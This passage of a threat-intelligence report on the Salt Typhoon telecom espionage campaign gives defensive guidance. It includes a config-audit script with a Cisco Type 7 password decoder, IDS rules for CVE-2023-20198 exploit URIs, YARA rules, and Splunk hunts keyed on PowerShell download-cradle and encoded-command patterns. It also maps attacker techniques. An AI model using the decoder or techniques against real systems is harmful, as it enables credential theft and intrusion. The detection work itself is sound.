| Indian Telecom Breach Reports | Multiple incidents (BSNL data exposure, 750M user leak) with unattributed but sophisticated TTPs | ⚪ Low (No public attribution) |
High-Risk Indian Entities
| Entity Type | Risk Factors | Recommended Actions |
|---|---|---|
| State-Owned Telecoms (BSNL, MTNL) | Legacy infrastructure; slower patching cycles; high-value target for geopolitical intelligence | Prioritize Cisco IOS XE/Ivanti patching; audit Guest Shell configurations |
| Private Telecom Operators (Jio, Airtel, Vi) | Large subscriber bases; critical national infrastructure; potential CALEA access | Implement management-plane isolation; deploy behavioral NDR |
| Government Networks | Policy communications; personnel data; potential pivot point to defense networks | Enforce MFA for administrative access; segment management traffic |
| Critical Infrastructure Operators | Pre-positioning for disruption capability during crisis | Conduct Salt Typhoon-specific threat hunting; validate IR playbooks |
CERT-In & NCIIPC Coordination
- Reporting Requirement: CERT-In Directions 2022 mandate incident reporting within 6 hours of detection
- Log Retention: Preserve logs for minimum 180 days per IT Act compliance
- CII Designation: Organizations operating Critical Information Infrastructure must coordinate with NCIIPC for threat intelligence sharing
6. DETECTION & MITIGATION GUIDANCE
6.1 Immediate Actions (0-72 Hours)
| Priority | Action | Reference CVE/Technique | Verification Method |
|---|---|---|---|
| 🔴 Critical | Patch Cisco IOS XE CVE-2023-20198/20273 | cisa.gov | `show version` for the running release; `show running-config \| include username` for unexpected privilege-15 accounts (exploitation is known to create names such as cisco_tac_admin or cisco_support) |
| 🔴 Critical | Patch Ivanti CVE-2023-46805/2024-21887 | cisa.gov | Ivanti admin console, external scan, and the Ivanti Integrity Checker Tool |
| 🔴 Critical | Disable Cisco Guest Shell / IOx if unused | T1610 | `show app-hosting list` (no unexpected RUNNING guestshell) and `show iox-service` |
| 🔴 Critical | Audit ACLs for unauthorized IP additions | T1562.004 | `show access-lists` and `show running-config \| section access-list`, diffed against the last known-good configuration |
| 🟠 High | Restrict management interfaces to trusted IPs | T1021.004 | Firewall rule audit |
| 🟠 High | Enable SNMPv3 with auth/privacy; disable v1/v2 | T1021 | show snmp user |
| 🟠 High | Rotate all TACACS+/RADIUS shared secrets | T1556 | AAA config review |
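The audit items in this table, the persistence indicators in 3.3 (relocated SSH port, ACL entries, GRE tunnel endpoints, Guest Shell/IOx) and the credential-access points in 3.5 (rogue TACACS+ servers, reversible Type 7 secrets in stolen configs) can all be checked from a saved running-config. The script below is an added example written for this report, not a CISA/NSA tool: it walks a constructed IOS XE config, emits one finding per suspicious line, and decodes Type 7 secrets to make the point about configuration theft concrete. The trusted management network and AAA server (`TRUSTED_MGMT`, `TRUSTED_AAA`) are assumptions standing in for an operator's inventory; the Type 7 key is Cisco's well-known constant; the account names are the ones Cisco's CVE-2023-20198 advisory reported the implant creating.

```python
"""Audit a Cisco IOS XE running-config for the persistence (3.3), credential-access (3.5)
and 6.1 audit items. Added example with a constructed config; not CISA/NSA tooling."""
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List

# Assumed inventory for this example (replace with your own): known-good management
# source networks and the legitimate TACACS+/RADIUS server addresses.
TRUSTED_MGMT = [ip_network("10.10.0.0/24")]
TRUSTED_AAA = {"10.10.0.5"}
# Local accounts that CVE-2023-20198 exploitation is known to create (Cisco advisory).
SUSPICIOUS_USERS = {"cisco_tac_admin", "cisco_support"}
# Cisco's fixed Type 7 XOR key; the two leading digits of a Type 7 string are the offset.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"


def decode_type7(enc: str) -> str:
    """Reverse a Type 7 password: 2-digit key offset, then one hex byte per character."""
    seed = int(enc[:2])
    out = bytearray()
    for i, pos in enumerate(range(2, len(enc), 2)):
        out.append(int(enc[pos:pos + 2], 16) ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)])
    return out.decode("ascii", errors="replace")


def _trusted(ip: str) -> bool:
    try:
        return any(ip_address(ip) in net for net in TRUSTED_MGMT)
    except ValueError:
        return False


def audit_config(config: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious line: {'type', 'line', 'detail'}."""
    findings: List[Dict[str, str]] = []
    section = ""  # current top-level block, e.g. 'interface Tunnel0' or 'tacacs server X'

    def add(kind: str, line: str, detail: str = "") -> None:
        findings.append({"type": kind, "line": line.strip(), "detail": detail})

    for raw in config.splitlines():
        s = raw.strip()
        if not raw.startswith(" "):
            section = s
        if (m := re.match(r"ip ssh port (\d+)", s)) and m.group(1) != "22":
            add("ssh_nonstandard_port", s, f"port {m.group(1)}")              # 3.3
        elif s == "iox" or s.startswith("app-hosting appid guestshell"):
            add("iox_guestshell_enabled", s)                                   # 3.3 Guest Shell
        elif s in ("ip http server", "ip http secure-server"):
            add("web_ui_enabled", s, "CVE-2023-20198 attack surface")
        elif (m := re.search(r"\bpermit\b.*?" + IPV4, s)) and not _trusted(m.group(1)):
            add("acl_untrusted_source", s, m.group(1))                         # 3.3 ACL tampering
        elif section.startswith("interface Tunnel") and (m := re.match(r"tunnel destination " + IPV4, s)):
            if not _trusted(m.group(1)):
                add("tunnel_untrusted_endpoint", s, f"{section} -> {m.group(1)}")  # 3.3 GRE
        elif (m := re.match(r"username (\S+) privilege 15", s)):
            known = m.group(1) in SUSPICIOUS_USERS
            add("priv15_account", s, "matches CVE-2023-20198 implant account" if known else "review")
        elif (m := re.match(r"(?:tacacs-server host|address ipv4) " + IPV4, s)) and m.group(1) not in TRUSTED_AAA:
            add("rogue_aaa_server", s, f"{section}: {m.group(1)}")            # 3.5 TACACS+ hijack
        elif (m := re.search(r"\b(?:password|key) 7 ([0-9A-Fa-f]{4,})", s)):
            add("type7_reversible_secret", s, "decodes to " + decode_type7(m.group(1)))  # 3.5
        elif re.match(r"snmp-server community ", s):
            add("snmp_v1v2c_community", s)
    return findings


def finding_types(config: str) -> List[str]:
    return [f["type"] for f in audit_config(config)]


SAMPLE_CONFIG = """\
! constructed sample running-config for this example
hostname PE-EDGE-01
iox
ip http secure-server
ip ssh port 22122
username netops privilege 15 secret 9 $9$placeholder
username cisco_tac_admin privilege 15 secret 9 $9$placeholder
access-list 20 permit 10.10.0.0 0.0.0.255
access-list 20 permit 203.0.113.7
tacacs server PRIMARY
 address ipv4 10.10.0.5
 key 7 094F471A1A0A
tacacs server BACKUP
 address ipv4 198.51.100.9
interface Tunnel0
 tunnel source GigabitEthernet0/0/0
 tunnel destination 198.51.100.9
interface Tunnel1
 tunnel destination 10.10.0.9
snmp-server community public RO
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"{f['type']:26} {f['line']:55} {f['detail']}")
```

Run it against a config pulled over the out-of-band path, never over the device's own data plane, and diff the output between collections: a new `acl_untrusted_source` or `rogue_aaa_server` finding between two snapshots is exactly the change the 3.3 and 3.5 tables describe.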
6.2 Network Detection Rules (Suricata/Snort)
The rules below use Suricata 5+ syntax (sticky buffers, `ip_proto`); a Snort 2 sensor needs the `http_uri`/`pcre` modifier form instead. The first rule matches on `http.uri.raw`, the wire form of the path, because the double encoding is precisely meant to survive one round of normalisation: the normalised `http.uri` buffer has already been decoded once and would show `%77eb%75i_%77sma_Http` instead.

```suricata
# Detect double-encoded Cisco IOS XE Web UI / WSMA requests (CVE-2023-20198)
alert http any any -> any any ( \
  msg:"SALT_TYPHOON_CVE-2023-20198_WSMA_BYPASS"; \
  flow:to_server,established; \
  http.method; content:"POST"; \
  http.uri.raw; content:"%25"; nocase; \
  pcre:"/%2577eb(?:ui|%2575i)_(?:wsma|%2577sma)_Https?/i"; \
  classtype:web-application-attack; sid:2025001; rev:2; \
)

# Detect SSH offered on the 22x22 / 18xxx ports noted in 3.3. Port lists belong in the
# rule header, not in an option; the banner check keeps the rule valid on both Snort and
# Suricata. On Suricata, "alert ssh any any -> any ![22]" catches SSH on any other port.
alert tcp any any -> any [22022,22122,22222,22322,22422,22522,22622,22722,22822,22922,18080,18443] ( \
  msg:"SALT_TYPHOON_NONSTANDARD_SSH_PORT"; \
  flow:to_server,established; \
  content:"SSH-2.0-"; depth:8; \
  classtype:policy-violation; sid:2025003; rev:2; \
)

# Detect GRE (IP protocol 47) from a source; "type limit" alerts once per source per
# 5 minutes instead of once per packet. GRE/mGRE is normal in carrier cores, so run this
# against $HOME_NET with known tunnel endpoints suppressed (threshold.config or pass rules).
alert ip any any -> any any ( \
  msg:"SALT_TYPHOON_GRE_TUNNEL_DETECTED"; \
  ip_proto:47; \
  threshold:type limit, track by_src, count 1, seconds 300; \
  classtype:policy-violation; sid:2025004; rev:2; \
)
```
6.3 Endpoint Detection Rules (YARA)
```yara
// Rule: Detect Salt Typhoon Cmd1 SFTP Client (Go-based)
rule SALT_TYPHOON_CMD1_SFTP_CLIENT {
    meta:
        description = "Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting."
        author = "CISA/NSA/FBI"
        date = "2025-09-03"
        sha256 = "f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4"
    strings:
        $s1 = "monitor capture CAP" ascii
        $s2 = "export ftp://%s:%s@%s%s" ascii
        $s3 = "main.CapExport" ascii
        $s4 = "main.SftpDownload" ascii
        $s5 = ".(*SSHClient).CommandShell" ascii
        $aes = "aes.decryptBlockGo" ascii
        $buildpath = "C:/work/sync_v1/cmd/cmd1/main.go" ascii
    condition:
        // MZ/PE header check, then any four of the Go symbol and format strings
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 4 of them
}

// Rule: Detect Demodex Rootkit Artifacts
rule SALT_TYPHOON_DEMODEX_ROOTKIT {
    meta:
        description = "Detects kernel-mode rootkit artifacts associated with Salt Typhoon"
        author = "CISA/NSA/FBI"
        threat_level = "critical"
    strings:
        $driver_name = "demodex.sys" ascii
        $service_name = "VGAuthtools" ascii   // weak alone: mimics VMware's VGAuthService name
        $mutex = "Global\\DEMODEX_MUTEX_2024" ascii
        $ioctl_code = { 22 A0 03 00 }          // DeviceIoControl code, little-endian
    condition:
        // Require a PE file plus either a high-confidence string or two weaker ones;
        // a bare "any of them" fires on every file containing the 4-byte IOCTL value.
        uint16(0) == 0x5A4D and ($driver_name or $mutex or 2 of them)
}
```
6.4 SIEM Hunting Queries (Splunk Example)
Hunt for double-encoded WSMA requests (Cisco exploitation). This assumes `uri`, `http_method` and `src_ip` are extracted from whatever records requests to the device Web UI (device HTTP access logs, an in-path proxy, or NDR). A literal `%25` followed by two hex digits means the request was encoded at least twice, which no normal client does, so the query does not need the exact WSMA path to be useful.

```spl
index=cisco sourcetype=cisco:ios uri="*%25*"
| regex uri="(?i)%25[0-9a-f]{2}"
| stats count, min(_time) AS first_seen, max(_time) AS last_seen, values(http_method) AS methods BY src_ip, uri
| sort - count
```

Detect unusual PowerShell launch patterns. Event 4104 records script block content, not the launch switches, so `-ex bypass` and `-enc` have to be hunted in process-creation telemetry (4688 with command-line auditing enabled, or Sysmon event 1). A second query then reads the decoded block text that 4104 does capture, which is where an encoded download cradle becomes visible.

```spl
index=windows (EventCode=4688 OR (source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1))
| eval cmd=coalesce(Process_Command_Line, CommandLine), who=coalesce(user, User)
| search cmd="*powershell*" AND (cmd="* -ex bypass*" OR cmd="* -ep bypass*" OR cmd="* -enc *" OR cmd="* -EncodedCommand *" OR cmd="* -version 2*")
| stats count, values(cmd) AS cmds BY host, who
| sort - count
```

```spl
index=windows EventCode=4104 (ScriptBlockText="*DownloadString*" OR ScriptBlockText="*Invoke-Expression*" OR ScriptBlockText="*IEX *" OR ScriptBlockText="*FromBase64String*" OR ScriptBlockText="*comsvcs*")
| stats count BY Computer, ScriptBlockText
| sort - count
```

Identify Guest Shell container activity. Commands run inside the container (`pip install`, `yum install`) are not written to the host syslog, as noted in 3.3, so searching host logs for them finds nothing. What the host does log is the container being enabled or destroyed and, with `archive log config` enabled, the configuration commands (`iox`, `app-hosting`) that make the container possible.

```spl
index=cisco sourcetype=cisco:ios (message="*guestshell*" OR message="*IOX*" OR message="*app-hosting*" OR message="*CFGLOG*")
| table _time, host, src_ip, message
| sort - _time
```
6.5 Telecom Infrastructure Hardening (Cisco IOS XE Example)
```text
! ========================================
! Salt Typhoon Mitigation: Cisco IOS XE
! Reference: CISA AA25-239A
! Apply AFTER patching CVE-2023-20198/20273
! <mgmt-subnet> <wildcard>, <tacacs-ip>, <syslog-collector> and the other
! angle-bracket values are placeholders for the operator's own settings
! ========================================
!
! === Disable Unused Services ===
! Keep the Web UI off unless it is required; if it must stay on the patched
! image, restrict it with "ip http access-class ipv4 MGMT_ONLY"
no ip http server
no ip http secure-server
no service tcp-small-servers
no service udp-small-servers
! Smart Install client (abused via SIET, see 3.3)
no vstack
!
! === AAA: TACACS+ with local fallback; rotate the shared secret (6.1) ===
aaa new-model
tacacs server PRIMARY
 address ipv4 <tacacs-ip>
 key <new-shared-secret>
aaa authentication login TACACS_LOCAL group tacacs+ local
aaa authorization exec default group tacacs+ local
aaa accounting exec default start-stop group tacacs+
aaa accounting commands 15 default start-stop group tacacs+
! Type 7 secrets are reversible (3.5); store local secrets as scrypt (type 9)
enable algorithm-type scrypt secret <enable-secret>
username <admin> privilege 15 algorithm-type scrypt secret <password>
!
! === Harden Management Plane ===
ip ssh version 2
ip ssh server algorithm encryption aes256-ctr aes192-ctr aes128-ctr
ip ssh server algorithm mac hmac-sha2-256 hmac-sha2-512
line vty 0 15
 transport input ssh
 access-class MGMT_ONLY in
 login authentication TACACS_LOCAL
 exec-timeout 5 0
!
! === ACL for Management Access (standard ACL: permitted SOURCE networks only) ===
ip access-list standard MGMT_ONLY
 permit <mgmt-subnet> <wildcard>
 deny   any log
!
! === Control Plane Policing (CoPP) ===
ip access-list extended COPP_MGMT_ACL
 permit tcp any any eq 22
 permit udp any any eq 161
class-map match-any COPP_MGMT
 match access-group name COPP_MGMT_ACL
policy-map COPP_POLICY
 class COPP_MGMT
  police cir 1000000 bc 1500 be 1500 conform-action transmit exceed-action drop violate-action drop
control-plane
 service-policy input COPP_POLICY
!
! === Disable Guest Shell / IOx (if not required) ===
! "guestshell destroy" is an exec-mode command; "no iox" then removes the container host
no iox
!
! === SNMP: v3 with authentication and privacy only ===
! remove every v1/v2c community string, then define a v3 group and user
no snmp-server community <community-string>
snmp-server group SNMP_RO v3 priv
snmp-server user <snmp-user> SNMP_RO v3 auth sha <auth-pw> priv aes 128 <priv-pw>
!
! === Logging & Monitoring ===
! use "transport tls port 6514" where a TLS profile is configured on the device
logging host <syslog-collector> transport tcp port 514
logging trap informational
service timestamps log datetime msec show-timezone
login on-failure log
login on-success log
! Log every configuration change (ACL edits, new users, tunnels) to syslog
archive
 log config
  logging enable
  notify syslog contenttype plaintext
  hidekeys
```
7. POLICY & REGULATORY IMPLICATIONS
7.1 United States
| Regulation/Policy | Impact | Action Required |
|---|---|---|
| Executive Order 14028 (Improving Cybersecurity) | Mandates zero trust architecture, software supply chain security for federal agencies | Accelerate ZTA adoption; implement SBOM requirements |
| FCC Telecom Security Rules | Requires telecom providers to secure network infrastructure | Conduct Salt Typhoon-specific risk assessments; report breaches within 30 days |
| CISA Binding Operational Directive 22-01 | Requires federal agencies to reduce exposure to known exploited vulnerabilities | Patch CVEs within mandated timelines; deploy CISA-approved detection rules |
7.2 India
| Regulation/Policy | Impact | Action Required |
|---|---|---|
| CERT-In Directions, 2022 | Mandates 6-hour incident reporting; 180-day log retention | Implement automated alerting; validate log retention systems |
| **Digital Personal Data Protection** (DPDP) | Requires breach notification for personal data exposure | Assess if subscriber metadata exposure triggers notification obligations |
| NCIIPC Guidelines for CII | Additional security requirements for Critical Information Infrastructure | Coordinate with NCIIPC for threat intelligence sharing; implement baseline controls |
| IT Act Section 43/66 | Liability for negligence in securing computer resources | Document security controls; maintain audit trails for compliance |
7.3 International Coordination
| Framework | Role in Salt Typhoon Response |
|---|---|
| **Five Eyes** (FVEY) | Intelligence sharing on TTPs, IOCs, attribution assessments |
| APCERT | Regional threat intelligence sharing for Asia-Pacific telecom operators |
| FIRST | Global coordination on incident response best practices |
| ITU-T X.1205 | International standards for telecom security; guidance for member states |
8. FUTURE THREAT OUTLOOK (2026-2028)
8.1 Expected Evolution of Salt Typhoon TTPs
| Trend | Likely Development | Defensive Implication |
|---|---|---|
| AI-Enhanced Evasion | Use of generative AI to craft polymorphic payloads that evade signature detection | Shift to behavioral detection; invest in AI-powered threat hunting |
| Supply Chain Compromise | Targeting of telecom equipment manufacturers to implant backdoors pre-deployment | Strengthen software supply chain security; implement hardware root of trust |
| Cloud Infrastructure Targeting | Expansion from on-prem routers to cloud-based telecom functions (vRAN, cloud core) | Extend detection to cloud environments; implement cloud workload protection |
| Quantum-Resistant Cryptography Attacks | Preparation for future decryption of captured encrypted traffic | Begin migration to post-quantum cryptography for long-lived secrets |
| Geopolitical Trigger Activation | Potential activation of pre-positioned access during Taiwan contingency or other crisis | Develop crisis response playbooks; conduct tabletop exercises for disruption scenarios |
8.2 Emerging Risk Scenarios
Scenario 1: “Silent Disruption” During Crisis
- Trigger: Geopolitical escalation involving China
- Action: Salt Typhoon activates pre-positioned access to disrupt communications in target regions
- Impact: Degraded emergency services, impaired military coordination, economic disruption
- Mitigation: Develop “break-glass” procedures for rapid network isolation; maintain offline communication backups
Scenario 2: “Credential Cascade” via Authentication Infrastructure
- Trigger: Successful harvest of TACACS+/RADIUS credentials from telecom provider
- Action: Use stolen credentials to pivot into government/defense networks
- Impact: Compromise of classified systems; theft of sensitive policy communications
- Mitigation: Implement just-in-time privileged access; enforce MFA for all administrative sessions
Scenario 3: “Supply Chain Poisoning” of Telecom Equipment
- Trigger: Compromise of router firmware update mechanism at manufacturer
- Action: Distribute malicious firmware updates to customer networks globally
- Impact: Widespread compromise requiring coordinated global response
- Mitigation: Implement firmware signing verification; establish trusted update channels
9. RECOMMENDATIONS BY STAKEHOLDER
9.1 For Telecom Operators
- Patch Aggressively: Prioritize CVE-2023-20198/20273 (Cisco), CVE-2024-21887 (Ivanti), CVE-2024-3400 (Palo Alto)
- Isolate Management Planes: Use VRFs, dedicated out-of-band networks, and strict ACLs for device management
- Disable Unused Features: Turn off Guest Shell, HTTP management interfaces, and legacy protocols if not required
- Deploy Behavioral Detection: Implement NDR solutions that detect anomalous lateral movement and credential abuse
- Conduct Red Team Exercises: Simulate Salt Typhoon TTPs to validate detection and response capabilities
9.2 For Government Agencies
- Mandate Minimum Security Standards: Require telecom providers to implement CISA/NCIIPC baseline controls
- Enhance Intelligence Sharing: Establish secure channels for real-time threat intelligence exchange with industry
- Fund Critical Infrastructure Protection: Allocate resources for telecom security modernization and incident response
- Develop Crisis Response Playbooks: Prepare for scenarios where compromised infrastructure could be weaponized
- Coordinate International Response: Work with allies to attribute attacks and impose consequences on state sponsors
9.3 For Security Vendors
- Develop Telecom-Specific Detections: Create rules tuned to router CLI commands, SNMP patterns, and telecom protocols
- Improve LOTL Detection: Enhance behavioral analytics to distinguish legitimate admin activity from attacker use of native tools
- Support Cloud-Native Telecom: Extend detection capabilities to virtualized network functions and cloud-based core networks
- Provide Threat Intelligence Feeds: Deliver Salt Typhoon IOCs and TTPs in machine-readable formats for automated ingestion
- Offer Incident Response Support: Maintain specialized teams trained in telecom infrastructure forensics
9.4 For Individual Users
- Use End-to-End Encrypted Messaging: For sensitive communications, use Signal, WhatsApp (with E2EE enabled), or other encrypted platforms
- Enable Multi-Factor Authentication: Protect all accounts, especially email and financial services
- Monitor Account Activity: Review login histories and enable alerts for unusual access patterns
- Stay Informed: Follow guidance from national CERTs and trusted security sources
- Report Suspicious Activity: Notify your service provider or national CERT of potential security incidents
10. CONCLUSION
Salt Typhoon represents a new paradigm in state-sponsored cyber operations: infrastructure control as a strategic capability. Unlike traditional espionage campaigns focused on stealing data, Salt Typhoon seeks to own the communications infrastructure itself—enabling both continuous intelligence collection and potential disruption during crisis.
The campaign’s global scale (80+ countries), technical sophistication (kernel-mode rootkits, living-off-the-land techniques), and strategic patience (3+ year dwell times) demonstrate unprecedented resource allocation by China’s Ministry of State Security. The FBI’s February 2026 confirmation that threats remain “still very much ongoing” underscores that this is not a historical incident but an active, evolving campaign.
Defending against Salt Typhoon requires a fundamental shift:
- From signature-based detection to behavioral analytics
- From perimeter security to zero trust architecture
- From reactive incident response to proactive threat hunting
- From siloed security teams to integrated network/identity/cloud defense
Organizations operating critical communications infrastructure cannot afford to wait. The window for proactive hardening is narrowing as Salt Typhoon continues to adapt and expand. Immediate action on patching, network segmentation, and behavioral detection is essential to reduce risk.
As the geopolitical landscape evolves, the stakes will only increase. The infrastructure compromised today could become the weapon of tomorrow. Investing in resilience now is not just a security imperative—it is a strategic necessity.
APPENDICES
Appendix A: MITRE ATT&CK Mapping (Summary)
| Tactic | Key Techniques Observed | Salt Typhoon Implementation |
|---|---|---|
| Initial Access | T1190: Exploit Public-Facing Application | CVE-2023-20198 (Cisco), CVE-2024-21887 (Ivanti) |
| Execution | T1059: Command and Scripting Interpreter | PowerShell -ex bypass, WMIC remote execution |
| Persistence | T1547.001: Registry Run Keys; T1610: Deploy Container | reg add commands; Guest Shell container abuse |
| Privilege Escalation | T1068: Exploitation for Privilege Escalation | CVE-2023-20273 chaining; Demodex rootkit |
| Defense Evasion | T1027: Obfuscated Files; T1562.004: Disable Security Tools | Double-encoding; ACL modification to permit attacker IPs |
| Credential Access | T1003: OS Credential Dumping; T1040: Network Sniffing | Mimikatz; Cisco EPC for TACACS+ capture |
| Discovery | T1087: Account Discovery; T1016: System Network Configuration | net group /domain; SNMP enumeration |
| Lateral Movement | T1021: Remote Services; T1570: Lateral Tool Transfer | SMB copy + WMIC exec; service creation with installutil |
| Collection | T1005: Data from Local System; T1114: Email Collection | CDR extraction; email harvesting via compromised accounts |
| Command and Control | T1071: Application Layer Protocol; T1572: Protocol Tunneling | Cobalt Strike beacons; GRE/IPsec tunnels over routers |
| Exfiltration | T1048.003: Exfiltration Over Alternative Protocol | Encrypted SFTP via peering connections; low-and-slow transfers |
